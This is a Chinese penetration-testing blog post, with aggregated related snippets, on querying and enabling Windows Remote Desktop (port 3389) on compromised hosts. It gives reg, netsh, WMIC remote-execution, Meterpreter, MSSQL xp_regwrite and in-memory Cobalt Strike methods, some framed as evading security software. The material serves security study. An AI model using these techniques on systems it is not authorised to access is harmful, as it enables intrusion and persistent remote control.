查询和开启3389端口方式总结

一颗小胡椒2022-03-20 10:27:33

声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。

请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

这篇文章在去年的时候有发过,不过后边又做了一点补充,所以再重新发一遍。

0x01 查询3389端口方式总结

fDenyTSConnections值是计算机远程管理中的开启/关闭远程桌面选项,fEnableWinStation值是远程桌面会话主机配置中的RDP-TCP启用/禁用连接选项,可以通过以下命令来查询、开启和关闭3389远程桌面。

注:如果fDenyTSConnections值为0开启状态,但还是不能连接3389远程桌面,这时我们可以去看下fEnableWinStation值是否为0了,1:Enable,0:Disable,该值在PC机上设置无效,因为没有远程桌面会话主机配置,从Windows 2012开始,tsconfig.msc和tsadmin.msc管理单元都已经被移除了。

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v fEnableWinStationreg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v fEnableWinStation /t REG_DWORD /d 1 /f

(1) REG查询3389状态(0:ON、1:OFF)

REG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

(2) REG查询3389端口(16进制->10进制)

REG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumberREG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumberset /a Port=0xd3d

(3) tasklist、netstat命令查询3389端口

tasklist /svc | findstr "TermService"netstat -ano | findstr "2972"

注:有时也会遇到特殊情况,如某虚拟主机自建低权限用户运行的IIS(Users、IIS_IUSRS),tasklist /svc不显示服务名,注册表查看是0xd3d,但netstat -ano里又没有3389端口,这可能是因为3389远程终端被关闭了,Users权限下只能根据个人经验盲猜可疑端口号。

(4) Meterpreter的netstat查询3389端口

有时我们会遇到不能执行netstat、tasklist和reg等命令的情况,这时可通过Meterpreter下的netstat命令来快速查询3389端口,先找0.0.0.0运行的svchost.exe,然后根据个人经验盲猜可疑端口。

常见端口大家都知道,如:FTP、RPC等,就不细说了,有顺序的端口指定不是,剩下的就一个58895了。

0x02 开启3389端口方式总结

如果目标主机没有配置过远程桌面服务,第一次开启3389远程桌面服务时可能需要添加下防火墙入站规则,允许3389端口,也可以选择关闭系统自带防火墙,命令如下。

netsh advfirewall firewall add rule name="Remote Desktop" protocol=tcp dir=in localport=3389 action=allow

修改3389端口前需要在防火墙添加修改远程端口的入站规则,或者暂时关闭防火墙,否则用修改后的端口号可能会连接不上,修改完成后还需要重启下TermService服务。

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 9527 /fnet stop TermService /ynet start TermService

(1) MSF命令开启3389端口

支持系统:

  • XP/Win2k3/Win7/Win2k8/Win8.1/Win10/2012/2016
meterpreter > run getgui -e
[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.[!] Example: run post/windows/manage/enable_rdp OPTION=value [...][*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator[*] Carlos Perez carlos_perez@darkoperator.com[*] Enabling Remote Desktop[...SNIP...]

注:这个脚本可用于开启目标机器的3389远程桌面端口、创建管理员账户密码、禁用远程桌面(TCP-In)防火墙入站规则等。

(2) REG命令开启3389端口

支持系统:

  • XP/Win2k3/Win7/Win2k8/Win8.1/Win10/2012/2016(0:ON、1:OFF)
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

(3) WMIC命令开启3389端口

支持系统:

  • Win2k3/Win7/Win2k8/Win8.1/Win10/2012/2016(1:ON、0:OFF)
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1前提条件是确保“Windows Management Instrumentation(Winmgmt)”服务已正常启动。

(4) WMIC开启远程主机3389端口:

支持系统:

  • Win2k/XP/Win2k3
wmic /node:192.168.0.103 /user:administrator /password:betasec PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1

支持系统:

  • Win7/Win2k8/Win8.1/Win10/2012/2016
wmic /node:192.168.0.116 /user:administrator /password:betasec!@#123 RDTOGGLE WHERE ServerName='WIN-TO2CN3V2VPR' call SetAllowTSConnections 1wmic /node:192.168.0.116 /user:administrator /password:betasec!@#123 process call create 'cmd.exe /c REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

注意事项:

  1. 其实就是利用WMIC远程执行命令的方式来执行WMIC、REG等开启3389端口的命令。
  2. WMIC远程开启3389端口时不能用%COMPUTERNAME%环境变量替代远程主机的计算机名。
  3. 错误:描述 = 拒绝访问,这是因为开启了UAC用户账户控制,只允许RID500管理员执行此操作。

(5) Windows API开启3389端口

冷逸老哥用C++写的“开3389工具”有点小问题,在两台Windows2008主机上测试时分别报出缺少vcruntime140.dll、api-ms-win-crt-runtime-l1-1-0.dll,可以自己去调试编译下

根据@冷逸老哥的思路用C#也写了一个,目标框架:.NET Framework 2.0,可用CobaltStrike execute-assembly加载到内存中实现无落地执行。

其工具原理就是利用RegCreateKeyEx和RegSetValueEx两个API和Microsoft.Win32 RegistryKey类操作系统注册表,与无Net.exe添加管理员用户一样,都是直接利用Windows API执行相应操作!!!

  • https://github.com/3had0w/Open3389

应用场景-1:

目标主机因存在某安全防护软件而无法用reg、wmic命令开启3389端口时,可以尝试使用这款工具来查询和开启3389端口,可用execute-assembly加载到内存中执行。

应用场景-2:

目标主机因存在某安全防护软件(如:某锁、某安全卫士)在拦截rundll32.exe时则不能用execute-assembly加载到内存中执行,所以只能选择落地执行,目前为止还是免杀的。

(6) MSSQL xp_regwrite开启3389端口

应用场景:

xp_cmdshell被禁用/删除且无法恢复时,可尝试用xp_regread、xp_regwrite来查询和开启目标机器3389端口,也可以选择用sp_OACreate、Agent Job等其他命令执行方式。

1、查询3389开启状态exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server' ,'fDenyTSConnections'
2、查询3389远程桌面端口exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber' 
3、开启3389远程桌面端口(0:ON、1:OFF)exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;

(7) 一次开启3389端口失败原因的查找

通过计算机右键开启远程桌面或REG、WMIC开启3389端口命令都执行成功,但netstat -ano没有3389端口,tasklist /svc也没有TermService服务,最后在Services.msc找到TermService服务时发现:<读取描述失败。错误代码2>。出现这种情况是因为对应的C:\Windows\System32\termsrv.dll文件已经不存在了,可能是笔者以前在测试RDPWrap项目时给误删除掉了。

启动TermService服务时必须加载termsrv.dll,所以无法通过常规方式开启3389端口,这时我们只需要将原来备份的termsrv.dll或找到对应版本操作系统的termsrv.dll拷贝到C:\Windows\System32\目录下,启动TermService服务,重新开启3389远程桌面后即可解决。

远程桌面连接3389端口
本作品采用《CC 协议》,转载必须注明作者和本文链接
远程桌面对了解内网渗透的人来说可能再熟悉不过了。在渗透测试中,拿下一台主机后有时候会选择开 3389远程桌面查看一下对方主机内有无一些有价值的东西可以利用。但是远程桌面的利用不仅如此,本节我们便来初步汇总一下远程桌面在内网渗透中的各种利用姿势。
实战|记一次域渗透
2022-07-30 22:48:31
文章没有使用扫描模块或者nmap添加代理对内网扫描的过程。msf提供的代理模块是指,能供其他应用使用的代理。这就是为什么很多文章里写道,拿到一个shell后,会添加一条路由,再配置socks4a模块,然后修改proxychains4.conf文件了。其他用proxychains4使用代理的,比如proxychains4 nmap,是通过msf拿到的shell的转发出去的。
进来之后,我们就可以在攻击机上面控制win7靶机了,先查看开放的端口有没有3389.3、命令行打开3389远程连接端口netstat -an. 显示successful,再次确认查看远程连接端口是否开启:netstat -an|find "3389". 现在分别讲讲各自的用法吧:5.1、xfreerdp工具①首先是xfreerdp的,命令格式如下:很容易理解,/u就是用户名,/p是密码,/v是靶机(目标)的地址 /size就是图形化界面的大小而已。输入y按下回车,等待界面出现5.2、xfreerdp工具②然后是rdesktop,命令格式很简单:rdesktop 192.168.25.132
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。这篇文章在去年的时候有发过,不过后边又做了一点补充,所以再重新发一遍。
渗透技巧总结
2022-01-23 13:30:33
整理一些渗透测试相关技巧总结~
1、查询3389端口方式 (1) REG查询3389状态(0:ON、1:OFF) REG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections (2) REG查询3389端口(16进制->10进制)
一颗小胡椒
暂无描述